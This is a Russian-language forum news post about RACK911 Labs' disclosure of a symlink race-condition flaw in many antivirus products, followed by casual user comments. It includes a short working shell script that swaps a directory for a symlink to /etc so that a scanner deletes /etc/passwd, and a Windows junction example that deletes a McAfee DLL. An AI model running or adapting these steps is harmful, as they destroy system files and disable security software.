Большинство антивирусов оказались подвержены атаке через символические ссылки

Большинство антивирусов оказались подвержены атаке через символические ссылки Антивирус, Mac Os, Windows, Linux, Длиннопост

Исследователи из компании RACK911 Labs обратили внимание на то, что почти все антивирусные пакеты для Windows, Linux и macOS были уязвимы для атак, манипулирующих состоянием гонки (race conditions) во время удаления файлов, в которых обнаружено вредоносное ПО.


Для проведения атаки необходимо загрузить файл, который антивирус распознает как вредоносный (например, можно использовать тестовую сигнатуру), а через определённое время, после выявления вредоносного файла антивирусом, но непосредственно перед вызовом функции для его удаления, подменить каталог с файлом символической ссылкой. В Windows для достижения того же эффекта выполняется подмена каталога при помощи точки соединения (directory junction). Проблема в том, почти все антивирусы должным образом не выполняли проверку символических ссылок и, считая что удаляют вредоносный файл, удаляли файл в каталоге на который указывает символическая ссылка.


В Linux и macOS показано как таким способом непривилегированный пользователь может удалить /etc/passwd или любой другой системный файл, а в Windows DDL-библиотеку самого антивируса для блокирования его работы (в Windows атака ограничена только удалением файлов, которые в текущим момент не используются другими приложениями). Например, атакующий может создать каталог "exploit" и загрузить в него файл EpSecApiLib.dll с тестовой сигнатурой вируса, после чего перед удалением заменить каталог "exploit" на ссылку "C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform", что приведёт к удалению библиотеки EpSecApiLib.dll из каталога антивируса. В Linux и macos аналогичный приём можно проделать с подменой каталога на ссылку "/etc".


#!/bin/sh

rm -rf /home/user/exploit ; mkdir /home/user/exploit/

wget -q https://www.clicklink.app/download/eicar.com.txt -O /home/user/exploit/passwd

while inotifywait -m “/home/user/exploit/passwd” | grep -m 5 “OPEN”

do

rm -rf /home/user/exploit ; ln -s /etc /home/user/exploit

done


Более того, во многих антивирусах для Linux и macOS было выявлено использование предсказуемых имён файлов при работе с временным файлами в каталоге /tmp и /private/tmp, что могло использоваться для повышения привилегий до пользователя root.


К настоящему времени проблемы уже устранены большинством поставщиков, но примечательно, что первые уведомления о проблеме были направлены производителям ещё осенью 2018 года. Несмотря на то, что не все производители выпустили обновления, им было дано на исправление как минимум 6 месяцев, и RACK911 Labs считает, что теперь вправе раскрыть сведения об уязвимостях. Отмечается, что компания RACK911 Labs давно занимается работой по выявлению уязвимостей, но она не предполагала, что с коллегами из антивирусной индустрии будет так трудно работать из-за затягивания выпуска обновлений и игнорирования необходимости срочного устранения проблем с безопасностью.


Продукты, подверженные проблеме (свободный антивирусный пакет ClamAV в списке отсутствует):


Linux

BitDefender GravityZone

Comodo Endpoint Security

Eset File Server Security

F-Secure Linux Security

Kaspersy Endpoint Security

McAfee Endpoint Security

Sophos Anti-Virus for Linux


Windows

Avast Free Anti-Virus

Avira Free Anti-Virus

BitDefender GravityZone

Comodo Endpoint Security

F-Secure Computer Protection

FireEye Endpoint Security

Intercept X (Sophos)

Kaspersky Endpoint Security

Malwarebytes for Windows

McAfee Endpoint Security

Panda Dome

Webroot Secure Anywhere


macOS

AVG

BitDefender Total Security

Eset Cyber Security

Kaspersky Internet Security

McAfee Total Protection

Microsoft Defender (BETA)

Norton Security

Sophos Home

Webroot Secure Anywhere

GNU/Linux

1K постов15.5K подписчика

Добавить пост

Правила сообщества

Все дистрибутивы хороши.

Будьте людьми.

Вы смотрите срез комментариев. Показать все
10
Автор поста оценил этот комментарий

Встроенный Windows Defender отлично защищает. Не понимаю зачем устанавливать другие антивируса и ещё и платить за некоторые.

раскрыть ветку (9)
2
Автор поста оценил этот комментарий
Слава антивирусов идёт по инерции, так же было с телефонами Нокиа, люди покупали это гавнище на windows phone, просто потому, что помнят времена когда Нокиа была лидером. То же с антивирусом, вот раньше из каждого утюга вещали, что нужно ставить. И теперь когда говоришь, что он не нужен, у людей округляются глаза.
раскрыть ветку (8)
3
Автор поста оценил этот комментарий

Гавнище на wp умело в фотографию лучше тогдашнего ойфона и синхронизацию умела. SwiftKey оттуда же. Ну и прочность нокии оно имело, в отличии от современной.

раскрыть ветку (4)
1
Автор поста оценил этот комментарий
Айфон когда то был high-end устройством? Серьезно? Сравнивать одно гавно с другим такое себе.
раскрыть ветку (3)
1
Автор поста оценил этот комментарий

Ну, блин, говно с пальцем тоже сравнивать глупо) Ладно, на момент выхода wp переплюнул всех по батарее! И 8 ГБ встроенной памяти)

раскрыть ветку (2)
1
Автор поста оценил этот комментарий
Ага и дикой анальной еблей с установкой своего рингтона.
раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Да вы прям в корень проблем зрите) На 3310 вообще по нотам писать приходилось)

1
Автор поста оценил этот комментарий
из каждого утюга вещали, что нужно ставить
Вещали :) если бы не ломанные антивирусы раньше, все бы сейчас были офигеть какими технически грамотными - потому что нельзя было придти домой и не найти на флешке пару вирусов (да, половину ещё нужно было умудриться запустить).
1
Автор поста оценил этот комментарий

Ещё и спорить начинают.

Меня работать переводили на удалёнку. По тимвьюверу админ подключился, чтобы впн настроить. И такой говорит "а антивируса-то у вас нет". Я ему объясняю, что хватает стандартного защитника, а он говорит, что нефига. И какую-то шляпу тормозящую от Касперского поставил. Она тормозить сразу начала и я её в последствии удалил.

раскрыть ветку (1)
2
Автор поста оценил этот комментарий
Да админы староверы, это паршивые овцы в стаде.
Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку